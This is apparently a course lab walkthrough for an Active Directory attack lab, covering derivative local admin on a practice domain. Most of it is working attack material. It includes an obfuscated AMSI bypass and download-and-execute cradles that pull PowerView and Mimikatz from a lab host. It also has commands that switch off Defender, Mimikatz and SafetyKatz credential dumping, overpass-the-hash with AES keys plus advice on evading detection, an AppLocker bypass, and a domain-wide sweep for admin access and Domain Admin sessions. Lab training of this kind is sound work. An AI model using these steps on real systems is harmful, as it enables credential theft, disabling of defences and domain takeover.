# Obj 7 Derivative Local Admin

{% hint style="success" %}
These commands are run from the reverse shell on dcorp-ci.
{% endhint %}

## Run AMSI bypass on machine

```
S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
```

## Load PowerView onto the machine

```
iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.X/PowerView.ps1'))
```

## Find Domain user location

```
Find-DomainUserLocation 
```

{% hint style="success" %}
Find-DomainUserLocation lists the machines where members of a target group (Domain Admins by default) currently have a session. We are looking for a DA session if possible, because local admin on that box lets us harvest the DA's credentials from LSASS.
{% endhint %}

## Check if we can run commands on the hosts where those sessions live

```
Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName dcorp-mgmt
```

## Get Mimikatz on the Target Machine

```
iex (iwr http://172.16.100.X/Invoke-Mimikatz.ps1 -UseBasicParsing)
```

## Create a new session for Target Machine

```
$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
```

## Disable Defender IOAV protection on Target Machine

This switches off Defender's scanning of downloaded files and attachments (IOAV) in the remote session so the Mimikatz function can be pushed across without being quarantined; real-time monitoring is disabled separately in a later step.

```
Invoke-Command -ScriptBlock {Set-MpPreference -DisableIOAVProtection $true} -Session $sess
```

## Now we can Invoke Mimikatz on Target Machine to Get Creds

```
Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess
```

## Now we can use Over Pass the Hash with Rubeus

We can use Rubeus, Mimikatz or SafetyKatz for this. All three examples below pass the account's AES256 key rather than its NTLM hash, so the TGT request is AES-encrypted instead of the RC4 (etype 0x17) request that stands out in 4768 events. Rubeus's `/opsec` additionally mimics the AS-REQ sequence of a genuine Windows logon, and `/createnetonly` starts the new process with a netonly logon, so only its network authentication uses the injected ticket.

## Rubeus Over Pass The Hash

```
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
```

## Mimikatz Over Pass The Hash

```
Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /run:powershell.exe"'
```

## SafetyKatz Over Pass The Hash

```
C:\AD\Tools\SafetyKatz.exe "sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /aes256:145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4 /run:cmd.exe" "exit"
```

## <mark style="color:orange;">- DERIVATIVE LOCAL ADMIN -</mark>

In the process we spawned with svcadmin's credentials above, check which machines we can reach as local admin over PS Remoting.

```
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
```
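The two enumeration steps on this page (finding where Domain Admins have sessions, and finding which machines accept our PS Remoting) are the core of derivative local admin, so here they are combined into one sweep. This is an added example, not course code or a PowerView function; it assumes PowerView is already loaded in the current process and that the process holds the credentials being tested (for example the svcadmin process). Names such as `Test-RemoteAdminAccess` are mine.

```powershell
# Added example (not course code): sweep the domain for hosts we can reach as
# local admin over PS Remoting and flag the ones where a Domain Admin has a
# session. Assumes PowerView is loaded in this process.
function Test-RemoteAdminAccess {
    param([Parameter(Mandatory)][string]$ComputerName)
    # Short open timeout (milliseconds) so dead hosts do not stall the sweep
    $opt = New-PSSessionOption -OpenTimeout 5000
    try {
        $out = Invoke-Command -ComputerName $ComputerName -SessionOption $opt -ErrorAction Stop -ScriptBlock {
            # No .NET method calls here so the check also works on hosts running
            # ConstrainedLanguage mode; S-1-5-32-544 is the local Administrators SID.
            $isAdmin = (whoami /groups | Out-String) -match 'S-1-5-32-544'
            "$env:USERDOMAIN\$env:USERNAME|$isAdmin"
        }
        $runsAs, $admin = $out -split '\|'
        [pscustomobject]@{ ComputerName = $ComputerName; Reachable = $true;  RunsAs = $runsAs; LocalAdmin = ($admin -eq 'True') }
    } catch {
        [pscustomobject]@{ ComputerName = $ComputerName; Reachable = $false; RunsAs = $null;   LocalAdmin = $false }
    }
}

# Hosts where members of Domain Admins currently have a session (short name, lowercased)
$daHosts = Find-DomainUserLocation -UserGroupIdentity 'Domain Admins' -ErrorAction SilentlyContinue |
    ForEach-Object { ($_.ComputerName -split '\.')[0].ToLower() } | Sort-Object -Unique

# Every computer object in the domain, by DNS host name
$computers = Get-DomainComputer -Properties dnshostname | ForEach-Object { $_.dnshostname } | Where-Object { $_ }

$results = foreach ($c in $computers) {
    $r = Test-RemoteAdminAccess -ComputerName $c
    $short = ($c -split '\.')[0].ToLower()
    $r | Add-Member -NotePropertyName HasDASession -NotePropertyValue ($daHosts -contains $short) -PassThru
}

# Reachable hosts first, DA-session hosts at the top: those are the pivots worth taking
$results | Where-Object Reachable | Sort-Object HasDASession -Descending | Format-Table -AutoSize
```

Every connection attempt leaves a network logon (4624/4625) and a WinRM operational log entry on the target, so in a real engagement run this against a shortlist of hosts rather than the whole domain.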

## We can start a PSSession on any of the machines we found

```
Enter-PSSession -ComputerName dcorp-adminsrv
```

## We need to check what language mode we are in first.

```
$ExecutionContext.SessionState.LanguageMode
```

## Next we can check the AppLocker policy to see if/where we can run scripts from

Under AppLocker script enforcement PowerShell drops into ConstrainedLanguage mode, but a script started from a path the policy allows runs in FullLanguage, so the path rules tell us where a dropped script will actually work.

```
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
```

## We can now disable Windows Defender real-time scanning on the target

```
Set-MpPreference -DisableRealtimeMonitoring $true -Verbose
Set-MpPreference -DisableIOAVProtection $true -Verbose
```

## Create a Modified Mimikatz script to execute on load

Because `iex` of downloaded text and dot-sourcing are crippled in ConstrainedLanguage mode, we bake the command into the script file itself and later run that file from an AppLocker-allowed path, where it executes in FullLanguage.

1. Make a copy of Invoke-Mimikatz.ps1 and name it Invoke-MimikatzEx.ps1.
2. Open Invoke-MimikatzEx.ps1 in PowerShell ISE.
3. Add `Invoke-Mimikatz -Command '"sekurlsa::ekeys"'` as the very last line of the file.

## Now we can transfer the new file over

We are copying this from our foothold machine in the process created for svcadmin.

```
PS C:\AD\Tools> Copy-Item C:\AD\Tools\Invoke-MimikatzEx.ps1 '\\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\Program Files'
```

## Back on the Target Machine we can invoke Mimikatz

```
[dcorp-adminsrv]: PS C:\Program Files> .\Invoke-MimikatzEx.ps1
```

## Over Pass the Hash with SafetyKatz

Again we can use SafetyKatz, Rubeus or Mimikatz to do this also. We will use one of the creds we found in the previous hash dump.

```
C:\AD\Tools\SafetyKatz.exe "sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /aes256:145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4 /run:cmd.exe" "exit"
```

## In the new process that started, run Invisi-Shell and look for PS Remoting local admin access again

```
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess -Verbose
```

## Extract credentials from our findings using SafetyKatz

We could use Mimikatz for this, but this time we are going to use SafetyKatz, so we first copy Loader.exe to the target machine. The `echo F |` answers xcopy's "file or directory?" prompt so the copy runs unattended.

```
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe
```

## We can now winrs or PSRemote in and invoke SafetyKatz

Loader.exe fetches SafetyKatz.exe from the target's own loopback address, so this only works if port 8080 on dcorp-mgmt has already been forwarded to the host that is serving the binary.

```
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit
```

## We can do the same as above with Mimikatz to dump the credentials of the target machine

1. First disable AMSI on the target machine (copy and paste the AMSI bypass from the top of this page).
2. Download and execute Invoke-Mimikatz.ps1:\
   `iex (iwr http://172.16.100.X/Invoke-Mimikatz.ps1 -UseBasicParsing)`
3. On the target machine run:\
   `Invoke-Mimikatz -Command '"sekurlsa::ekeys"'`

## We can also dump credentials from the Credential Manager vault with Mimikatz

```
Invoke-Mimikatz -Command '"token::elevate" "vault::cred /patch"'
```

## Finally we can use Over Pass the Hash with svcadmin credentials to start a new process as Domain Admin

```
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
```
